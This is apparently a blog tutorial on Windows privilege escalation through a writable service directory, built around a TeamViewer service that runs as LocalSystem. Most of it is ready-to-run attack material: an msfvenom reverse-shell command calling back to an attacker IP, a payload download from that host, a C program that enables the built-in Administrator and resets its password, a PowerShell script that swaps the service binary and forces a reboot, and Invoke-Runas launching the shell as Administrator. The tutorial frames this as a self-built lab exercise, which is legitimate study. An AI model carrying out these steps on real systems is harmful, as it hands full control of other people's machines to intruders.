Windows Privilege Escalation — Service directory write based privesc (Method 2)

Nikhil Anand
5 min read · Sep 13, 2023


Service directory write based privesc — 2nd Method

Before exploiting the service we build the vulnerable machine ourselves, then carry out the exploit against it.

The Lab Setup and Initial Access steps are the same as in the previous post in this series.

Let's perform the Windows privilege escalation attack (service directory write based privesc).

We have our initial shell.

Now the question is: once you have an initial shell on a Windows system, what do you do?

The first thing, without a second thought, is to upload winPEAS and run it:

https://github.com/carlospolop/PEASS-ng/releases/download/20230910-ae32193f/winPEASx64.exe

Start a web server on the attacking machine (here Python's built-in HTTP server on port 8001) and download winPEAS onto the Windows box:

powershell -c wget http://192.168.29.219:8001/winPEASx64.exe -OutFile win.exe

(In Windows PowerShell, wget is an alias for Invoke-WebRequest, hence the -OutFile switch.)

Now run the downloaded binary (win.exe).

The part of the output we care about is "Installed Applications", specifically a folder marked [All Access]: the current user has full control over it.

Querying the service (sc qc <service>) shows the fields that matter:

AUTO_START: the service starts automatically when the system boots, so a reboot restarts it.
BINARY_PATH_NAME: the path of the service executable.

SERVICE_START_NAME is LocalSystem, so the service runs as NT AUTHORITY\SYSTEM, the highest privilege on the box.

We cannot start or stop the service ourselves, but we can write to the directory that holds its executable.
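As an added example (not part of the original post), here is how the same condition can be checked by hand in PowerShell instead of reading it off the winPEAS output: enumerate auto-start services running as LocalSystem, test whether the current user can really write to the binary's directory, and read the service ACL to see whether we could restart the service ourselves. The service filter, the heuristic path parsing and the SDDL check are mine; the rights letters RP (SERVICE_START) and WP (SERVICE_STOP) follow the SDDL convention that sc.exe sdshow prints.

```powershell
# Added example, not from the original post. Finds services that (a) start automatically,
# (b) run as LocalSystem and (c) keep their executable in a directory the current user can
# write to. For each hit it also reports whether low-privileged principals may start/stop
# the service, which decides whether a reboot is needed to trigger a replaced binary.

function Get-ServiceExecutable {
    param([string]$PathName)
    # PathName may be quoted ("C:\Program Files\X\svc.exe" -flag) or unquoted with
    # arguments. Quoted paths are unambiguous; for unquoted ones we cut at the first
    # argument-looking token. This is a heuristic, not a full command-line parser.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+[-/]')[0].Trim()
}

function Test-DirectoryWritable {
    param([string]$Directory)
    # Evaluating ACLs by hand is error-prone (inheritance, group membership, deny ACEs).
    # A real write attempt is definitive: create a random file, then delete it again.
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Test-LowPrivCanRestart {
    param([string]$ServiceName)
    # sc.exe sdshow prints the service security descriptor in SDDL. In a service ACE,
    # RP = SERVICE_START and WP = SERVICE_STOP. We check only well-known low-privileged
    # SIDs: IU (Interactive), BU (Users), AU (Authenticated Users), WD (Everyone).
    $sddl = (sc.exe sdshow $ServiceName 2>$null) -join ''
    foreach ($sid in 'IU', 'BU', 'AU', 'WD') {
        if ($sddl -match "\(A;[^;]*;([A-Z]+);;;$sid\)") {
            $rights = $Matches[1]
            # Rights are two-letter tokens and no token starts with 'P', so a plain
            # substring test for RP/WP cannot match across token boundaries.
            if ($rights.Contains('RP') -and $rights.Contains('WP')) { return $true }
        }
    }
    return $false
}

function Get-WritableServiceDirs {
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            $exe = Get-ServiceExecutable $_.PathName
            $dir = Split-Path -Path $exe -Parent
            if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-DirectoryWritable $dir)) {
                [pscustomobject]@{
                    Service    = $_.Name
                    State      = $_.State
                    Binary     = $exe
                    Directory  = $dir
                    CanRestart = Test-LowPrivCanRestart $_.Name
                }
            }
        }
}

Get-WritableServiceDirs | Format-Table -AutoSize
```

On a default install the Users group cannot start or stop most services, so CanRestart will usually be False; that is exactly the situation in this walkthrough, and the reason the service has to be triggered by a reboot rather than a restart. If sc.exe sdshow is denied for a service, the function conservatively reports False.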

So let's generate a payload with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.29.219 lport=9009 -f exe > shell9009.exe

One option is to put this payload in place of the TeamViewer service executable: the service runs as LocalSystem, so the callback would be a SYSTEM shell. We will also use it later, once we have Administrator credentials.

Now the question is: how do we start the service?

We noticed the service is AUTO_START, so a reboot will launch it.

Let's check whether we have the right to reboot the system.

In the privilege listing below (whoami /priv), SeShutdownPrivilege shows as Disabled. That only means the privilege is not currently enabled in this token; it is present (standard users hold it by default on workstations), and shutdown.exe enables it itself before requesting the reboot, so the Disabled state can be ignored. What would matter is the privilege being absent from the list altogether.

Now we will create a small program that does not depend on a network callback, so it still works in a real environment where the reverse-shell payload's connection might be blocked by a firewall or the payload itself flagged by anti-virus.

We assume the built-in Administrator account is present, which it is by default.

Suppose you cannot get an Administrator reverse shell because of a firewall, network, or some other problem, but you do have a foothold (for example a web shell, or a shell as a low-privileged user) that lets you execute commands on the target.

The built-in Administrator account is often disabled, so in the first step we enable it, and in the second step we set its password to "Admin1234". Be aware that resetting the built-in Administrator's password is destructive and noisy (it generates Security log events 4722, account enabled, and 4724, password reset); on a real engagement get the client's approval first or use a less intrusive change.

#include <stdio.h>
#include <stdlib.h>   /* system() */

/* Launched by the Service Control Manager in place of the real service binary, so it
 * runs as LocalSystem. It never registers with the SCM, so the start is later reported
 * as failed (error 1053), but both commands have already executed by then. */
int main(void)
{
    /* The built-in Administrator account exists but is usually disabled. */
    system("net user administrator /active:yes");
    /* Set its password to a value we know. */
    system("net user administrator Admin1234");
    return 0;
}

Compile it with a Windows C compiler (for example the mingw-w64 cross-compiler on the attacking machine) and name the output "script.exe". Note that the original post wrote the switch as "/active yes"; net user requires the colon form "/active:yes".

Download script.exe to the target, into the TeamViewer service's directory.

While a service is running its executable is in use, and if you try to overwrite it you get "The process cannot access the file because it is being used by another process." A mapped image cannot be overwritten or deleted, but it can be renamed, as long as you have write access to the directory.

So we use rename: we rename the running service executable (TeamViewer_Service.exe) out of the way.

Then we copy script.exe into the directory under the name TeamViewer_Service.exe, so whenever that path is executed again, the code in script.exe runs instead.

This is the method to follow in service-directory-write privilege escalation: rename the running service executable and write our file in its place.

The official TeamViewer service path now points to our malicious executable.

How do we take advantage of this?

We have to reboot the system. On boot the Service Control Manager starts the TeamViewer service, which now launches script.exe as LocalSystem.

Rebooting the system.
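The rename-then-copy sequence described above, followed by the reboot, as one scripted step. This is an added example and not the author's own commands; the service name 'TeamViewer', the payload location C:\Users\Public\script.exe and the '.orig' backup suffix are assumptions based on the walkthrough, so adjust them to what your enumeration showed.

```powershell
# Added example, not from the original post. Replaces a running service's executable with
# our payload (rename the in-use image, copy ours into its place), verifies the swap, and
# reboots only if the service is auto-start and we hold SeShutdownPrivilege.
# Assumptions: service name 'TeamViewer', payload already uploaded to C:\Users\Public\script.exe.

function Get-ServiceExecutable {
    param([string]$PathName)
    # Quoted path ("C:\...\svc.exe" args) or unquoted path with arguments; heuristic split.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+[-/]')[0].Trim()
}

function Replace-ServiceBinary {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$Payload
    )
    $svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) { throw "Service '$ServiceName' not found" }
    $target = Get-ServiceExecutable $svc.PathName

    # A mapped (running) image cannot be overwritten or deleted: that is the
    # "being used by another process" error. It can be renamed, though, given write
    # access to the directory. Keep the original so the service can be restored later.
    $backup = "$target.orig"
    Rename-Item -LiteralPath $target -NewName (Split-Path -Leaf $backup) -ErrorAction Stop
    Copy-Item -LiteralPath $Payload -Destination $target -ErrorAction Stop

    # Confirm the file now sitting at the service path is byte-for-byte our payload.
    if ((Get-FileHash -LiteralPath $target).Hash -ne (Get-FileHash -LiteralPath $Payload).Hash) {
        throw "Verification failed: $target does not match $Payload"
    }

    [pscustomobject]@{
        Service   = $svc.Name
        RunsAs    = $svc.StartName      # expect LocalSystem
        StartMode = $svc.StartMode      # expect Auto
        Binary    = $target
        Backup    = $backup
    }
}

function Test-ShutdownPrivilege {
    # whoami /priv lists the privileges held by the token. "Disabled" only means not
    # currently enabled; shutdown.exe enables SeShutdownPrivilege itself. What matters
    # is that the privilege is listed at all.
    return [bool]((whoami /priv) -match 'SeShutdownPrivilege')
}

$swap = Replace-ServiceBinary -ServiceName 'TeamViewer' -Payload 'C:\Users\Public\script.exe'
$swap | Format-List

if ($swap.StartMode -eq 'Auto' -and (Test-ShutdownPrivilege)) {
    # At next boot the SCM launches our file as LocalSystem. It never registers with the
    # SCM, so the service start is reported as failed (error 1053) after the timeout, but
    # by then the commands inside the payload have already run.
    shutdown.exe /r /t 0
} else {
    Write-Warning 'Not auto-start, or no SeShutdownPrivilege: need another way to trigger the service.'
}
```

The hash comparison is there because Copy-Item into a directory you only partly control can silently produce a different file (an existing stub, an AV quarantine replacing the file); verifying before rebooting saves a wasted restart. Keeping the renamed original also lets you put the service back when you are done.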

Now the next question:

What is the advantage of enabling the "administrator" account and setting its password?

If SMB, RDP or SSH is reachable, you can log in with the Administrator credentials directly and take a shell that way.

But how do we take a shell from where we are?

We will use the Invoke-Runas.ps1 script from FuzzySecurity's PowerShell-Suite (saved here as runas.ps1):

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

Download the script to the target system and load it into the current session:

Import-Module .\runas.ps1

The script supports two logon types: 0x1 (LOGON_WITH_PROFILE, a normal local logon) and 0x2 (LOGON_NETCREDENTIALS_ONLY, the equivalent of runas /netonly, where the credentials are only used for network access).

Here we use 0x1.

In the command we give the full path of the executable to run, for example "C:\Users\Public\shell9009.exe".

The script launches that executable with the supplied account's rights.

We pass the reverse-shell executable generated with msfvenom earlier, with user "Administrator" and password "Admin1234", and a listener waiting on port 9009.

We get the shell, and whoami confirms the current user is "administrator".
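The post-reboot steps as one added example (not the author's commands): confirm the payload really ran as SYSTEM, then launch the msfvenom reverse shell under the Administrator account with Invoke-Runas. The parameter names are those of FuzzySecurity's Invoke-Runas.ps1; Get-LocalUser needs Windows PowerShell 5.1 or later; the service name 'TeamViewer', the file paths and the listener port 9009 are taken from the walkthrough and are assumptions.

```powershell
# Added example, not from the original post. Run on the target after it comes back up.
# Assumes: Invoke-Runas.ps1 is in the current directory, shell9009.exe is in C:\Users\Public,
# the hijacked service is named 'TeamViewer', and a listener is waiting on
# 192.168.29.219:9009 (on the attacker side, e.g.  nc -lvnp 9009  before step 3).

# 1. Evidence that script.exe executed as LocalSystem at boot: the built-in Administrator
#    is now enabled with a fresh PasswordLastSet, and the hijacked service is not running
#    (our binary never registered with the SCM, so its start was reported as failed).
$admin = Get-LocalUser -Name 'Administrator'
[pscustomobject]@{
    AdminEnabled    = $admin.Enabled
    PasswordLastSet = $admin.PasswordLastSet
    ServiceStatus   = (Get-Service -Name 'TeamViewer').Status
} | Format-List

# 2. Load Invoke-Runas (a wrapper around Advapi32!CreateProcessWithLogonW, the API
#    behind runas.exe). The post saves it as runas.ps1; the upstream name is used here.
Import-Module .\Invoke-Runas.ps1

# 3. Launch the reverse shell with the Administrator credentials we set.
#    -LogonType 0x1 = LOGON_WITH_PROFILE (local logon); 0x2 = LOGON_NETCREDENTIALS_ONLY,
#    the /netonly equivalent, which would only apply the credentials to network access.
Invoke-Runas -User 'Administrator' -Password 'Admin1234' -Domain '.' `
             -LogonType 0x1 -Binary 'C:\Users\Public\shell9009.exe'

# Built-in alternative using the same underlying API, if the script cannot be dropped:
# $cred = New-Object System.Management.Automation.PSCredential('Administrator',
#             (ConvertTo-SecureString 'Admin1234' -AsPlainText -Force))
# Start-Process -FilePath 'C:\Users\Public\shell9009.exe' -Credential $cred
```

The shell that calls back is a full administrator, not a UAC-filtered one: the built-in Administrator account (RID 500) is exempt from Admin Approval Mode by default, so the process gets an unfiltered high-integrity token, whereas the same API used with an ordinary local admin account would return a filtered medium-integrity token. whoami /groups in the new shell should show "Mandatory Label\High Mandatory Level". When you are done, restore the service binary you renamed so the machine is left working.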

Written by Nikhil Anand

CertusCyberSecurity | OSCP | CRTP
